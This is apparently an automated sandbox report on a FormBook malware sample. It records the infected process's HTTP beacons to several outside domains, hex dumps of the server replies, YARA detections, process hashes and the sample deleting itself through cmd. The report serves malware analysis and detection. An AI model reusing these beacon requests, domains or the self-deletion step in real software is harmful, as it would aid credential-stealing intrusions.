                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              cf-request-id: 0a97860cd800004ec8d8bd6000000001
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 65d2a5f489974ec8-FRA
                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                              Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 
73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30
                                                                                                              Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0


Session ID: 4, Source IP: 192.168.2.3, Source Port: 49747, Destination IP: 62.149.128.40, Destination Port: 80, Process: C:\Windows\explorer.exe
Timestamp: Jun 10, 2021 14:37:18.660567999 CEST, kBytes transferred: 3418, Direction: OUT
Data: GET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkTQi7ynUSvkYXlrnDKiUoE/Bv6J35YIy7pKLvP HTTP/1.1
Host: www.goldinsacks.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Jun 10, 2021 14:37:18.730734110 CEST, kBytes transferred: 3420, Direction: IN
Data: HTTP/1.1 404 Not Found
                                                                                                              Cache-Control: private
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Server: Microsoft-IIS/8.5
                                                                                                              X-Powered-By: ASP.NET
                                                                                                              Date: Thu, 10 Jun 2021 12:37:18 GMT
                                                                                                              Connection: close
                                                                                                              Content-Length: 5049
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 
20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 20 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20
                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px


Session ID: 5, Source IP: 192.168.2.3, Source Port: 49749, Destination IP: 160.153.136.3, Destination Port: 80, Process: C:\Windows\explorer.exe
Timestamp: Jun 10, 2021 14:37:28.964153051 CEST, kBytes transferred: 3434, Direction: OUT
Data: GET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=WU2tAheQ8tcf93YEudKDnPgih3iSbxP+RxOmhUzH4Gc7ohEPLFzZpUy5aqQrTWYg/sJi HTTP/1.1
Host: www.growwithjenn.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Jun 10, 2021 14:37:29.018930912 CEST, kBytes transferred: 3434, Direction: IN
Data: HTTP/1.1 400 Bad Request
                                                                                                              Connection: close


Session ID: 6, Source IP: 192.168.2.3, Source Port: 49750, Destination IP: 34.102.136.180, Destination Port: 80, Process: C:\Windows\explorer.exe
Timestamp: Jun 10, 2021 14:37:34.135488033 CEST, kBytes transferred: 3435, Direction: OUT
Data: GET /dp3a/?rTWxa=F+NQG3wr2qmzRibT9BAJK2aVObQEDzb5Y6jfukgEe6sv7RNklleEIbtQ/MsGh07J4TVQ&qXtd=VpFTeL6xRNZ0stZ0 HTTP/1.1
Host: www.bring-wellness.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Jun 10, 2021 14:37:34.273370028 CEST, kBytes transferred: 3435, Direction: IN
Data: HTTP/1.1 403 Forbidden
                                                                                                              Server: openresty
                                                                                                              Date: Thu, 10 Jun 2021 12:37:34 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 275
                                                                                                              ETag: "60c03ab8-113"
                                                                                                              Via: 1.1 google
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                              Code Manipulations

                                                                                                              Statistics

                                                                                                              Behavior

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Start time:14:35:29
                                                                                                              Start date:10/06/2021
                                                                                                              Path:C:\Users\user\Desktop\UGGJ4NnzFz.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
                                                                                                              Imagebase:0x400000
                                                                                                              File size:223620 bytes
                                                                                                              MD5 hash:B148AE414EB8A1B34A15CDB32C21F9EE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              Reputation:low

General

Start time: 14:35:30
Start date: 10/06/2021
Path: C:\Users\user\Desktop\UGGJ4NnzFz.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
Imagebase: 0x400000
File size: 223620 bytes
MD5 hash: B148AE414EB8A1B34A15CDB32C21F9EE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 14:35:35
Start date: 10/06/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff714890000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:35:56
Start date: 10/06/2021
Path: C:\Windows\SysWOW64\cmmon32.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\cmmon32.exe
Imagebase: 0xca0000
File size: 36864 bytes
MD5 hash: 2879B30A164B9F7671B5E6B2E9F8DFDA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 14:36:01
Start date: 10/06/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
Imagebase: 0xbd0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:36:01
Start date: 10/06/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis
